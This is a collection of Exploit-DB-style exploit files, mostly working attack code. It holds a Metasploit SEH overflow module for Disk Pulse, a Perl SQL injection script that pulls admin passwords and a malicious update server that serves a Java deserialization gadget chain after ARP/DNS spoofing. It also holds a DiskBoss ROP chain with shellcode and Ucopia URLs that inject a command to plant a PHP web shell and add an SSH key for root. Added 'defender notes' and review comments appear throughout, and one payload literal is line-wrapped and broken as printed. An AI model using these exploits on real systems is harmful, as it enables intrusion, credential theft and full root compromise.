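        ],
      'References'     =>
        [
          [ 'EDB', '42560' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # The encoded payload is placed at the very start of the overflowed
          # path and must end before the SEH record at 'Offset'. Declaring the
          # space lets the framework reject payloads that cannot fit, instead of
          # failing later with an obscure negative string length.
          'Space'       => 2492,
          'EncoderType' => "alpha_mixed",
          'BadChars'    => "\x00\x0a\x0d\x26"
        },
      'Targets'        =>
        [
          [ 'Disk Pulse Enterprise 9.9.16',
            {
              'Ret'    => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
              'Offset' => 2492        # bytes from the start of the path to the SEH record
            }]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Aug 25 2017',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(80)])
  end

  # Fingerprint the target from its landing page.
  #
  # Returns CheckCode::Unknown when no HTTP response came back (nothing was
  # proven either way), CheckCode::Appears when the exact vulnerable version
  # string is served, and CheckCode::Safe otherwise.
  def check
    res = send_request_cgi(
      'uri'    => '/',
      'method' => 'GET'
    )

    return Exploit::CheckCode::Unknown unless res

    if res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Build and send the overlong request path. Layout of the path:
  #   [encoded payload][A-filler up to Offset][nSEH + SEH][10 NOPs][jmp back][B-filler to 5000]
  def exploit
    print_status("Generating exploit...")
    shellcode = payload.encoded
    filler_len = target['Offset'] - shellcode.length
    # 'Space' in the payload info should already prevent this, but String#*
    # would otherwise raise an unhelpful ArgumentError on a negative count.
    if filler_len < 0
      fail_with(Failure::BadConfig,
                "Encoded payload is #{shellcode.length} bytes but only #{target['Offset']} bytes fit before the SEH record")
    end

    # Work on a copy: appending to payload.encoded directly would mutate the
    # string object the framework hands back.
    exp = shellcode.dup
    exp << 'A' * filler_len                  # buffer of trash until we get to offset
    exp << generate_seh_record(target.ret)   # nSEH short jump + POP POP RET in libpal.dll
    exp << make_nops(10)                     # NOP sled to make sure we land on jmp to shellcode
    exp << "\xE9\x25\xBF\xFF\xFF"            # jmp 0xffffbf2a - jmp back to shellcode start
    exp << 'B' * (5000 - exp.length)         # padding

    connect

    print_status("Sending exploit...")
    # The Host header value is carried over from the original exploit; the
    # server does not appear to depend on it.
    send_request_cgi(
      'uri'        => '/../' + exp,
      'method'     => 'GET',
      'host'       => '4.2.2.2',
      'connection' => 'keep-alive'
    )

    handler
    disconnect
  end
end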
#!/usr/bin/perl -w
# # # # #
# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
# Dork: N/A
# Date: 21.09.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
# Demo: http://www.photoreels.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Clear the terminal, picking the command by platform ($^O): "cls" on
# Windows, "clear" elsewhere. Returns whatever system() returns.
sub clear {
    my $cmd = ($^O eq 'MSWin32') ? 'cls' : 'clear';
    system($cmd);
}
clear();
# Banner (ASCII art) - purely cosmetic.
print "
################################################################################
#### ## ## ###### ### ## ##
## ## ## ## ## ## ## ### ##
## ## ## ## ## ## #### ##
## ######### ###### ## ## ## ## ##
## ## ## ## ######### ## ####
## ## ## ## ## ## ## ## ###
#### ## ## ###### ## ## ## ##
###### ######## ## ## ###### ### ## ##
## ## ## ### ## ## ## ## ## ### ##
## ## #### ## ## ## ## #### ##
###### ###### ## ## ## ## ## ## ## ## ##
## ## ## #### ## ######### ## ####
## ## ## ## ### ## ## ## ## ## ###
###### ######## ## ## ###### ## ## ## ##
Stock Photo Selling Script 1.0 - SQL Injection
################################################################################
";
# 'use' is compile-time, so placing it after the banner is fine; LWP::UserAgent
# also loads HTTP::Request, which is used below without its own 'use'.
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
# Expected to end with "/" - it is concatenated directly onto the script name.
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
# SQL injection PoC against the unescaped photo_sid parameter of
# photo_view.php: $cc is the injected sub-select, $host the full UNION query.
# Defender notes: the application-side fix is a prepared statement / bound
# parameter for photo_sid; the PoC's success marker is the <textarea> it
# wraps around the extracted values, which also makes the response easy to
# spot in logs.
$tt="tbl_configurations";
$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
# Single GET; no error handling for transport failures ($res->content is read
# regardless of HTTP status).
$res = $b->request(HTTP::Request->new(GET=>$host));
# Non-greedy capture of the first <textarea>...</textarea> pair, i.e. the
# marker the injected query wraps its output in.
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/index.php?mod=login\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitation:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicious serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
    """Answer every POST with one fixed Java serialized object stream.

    Python 2 only (``print`` statements, ``SimpleHTTPServer``). The body
    starts with the Java serialization magic ``AC ED 00 05``; per the
    comments in do_POST it was produced with ysoserial's
    CommonsCollections1 chain. Serving it to the ERS Data System client
    exercises the unsafe ``UpdateRequest`` deserialization described in
    the file header (CVE-2017-14702).

    Defender notes: the root cause is deserializing attacker-controlled
    input fetched over plain HTTP. Mitigations are to stop using Java
    native serialization for the update channel (or restrict it with a
    deserialization filter) and to fetch updates over TLS with
    certificate validation, which removes the DNS/ARP spoofing step.
    """

    def __init__(self,req,client_addr,server):
        # Pass-through to the base constructor; no extra state is kept.
        SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)

    def do_POST(self):
        """Ignore the request body and return the serialized gadget chain."""
        # java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
        # python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
        # NOTE(review): the literal below appears to have been line-wrapped
        # during extraction (a "\x" escape is split across lines), so it is
        # not valid Python as printed here.
        response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x
70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x
72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
        )
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        # Content-length is the byte length of the blob (Python 2 str == bytes).
        self.send_header("Content-length", len(response))
        self.end_headers()
        self.wfile.write(response)
# Listen on all interfaces, TCP 3311 - the port the thick client uses for
# its update API (see the header above). Python 2 only.
try:
    httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
    print "Serving at port: ", 3311
    httpd.serve_forever()
except:
    # NOTE(review): a bare except also catches KeyboardInterrupt/SystemExit
    # and hides bind failures (e.g. port already in use) behind "Exiting...".
    print "Exiting..."
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
# Local buffer-overflow PoC for DiskBoss Enterprise v8.4.16: builds an
# overlong "Share Name" value and writes it to shareName.txt, which the
# user pastes into the client by hand (steps in the header). Python 2 only:
# str and the bytes returned by struct.pack are concatenated directly,
# which raises TypeError on Python 3.
#
# Defender notes: the overflow is in the local GUI's share-name handling,
# so the impact is code execution as the user running DiskBoss. The chain
# below depends on fixed addresses in a 0x652xxxxx module - presumably a
# DLL without ASLR; confirm. A fixed vendor build is not stated on this page.
buff = "a"*1312   # filler before the first controlled address
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"    # "PADD" = 4 throwaway bytes consumed by a pop / retn N
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
# Payload: alphanumeric-encoded windows/exec "calc.exe" (msfvenom line
# below); BufferRegister=EAX matches the "jmp eax" gadget above.
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
# Write raw bytes ("wb": no newline translation on Windows); the file is
# closed explicitly rather than via a with-block.
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to the Ucopia wifi guest network, every request is redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27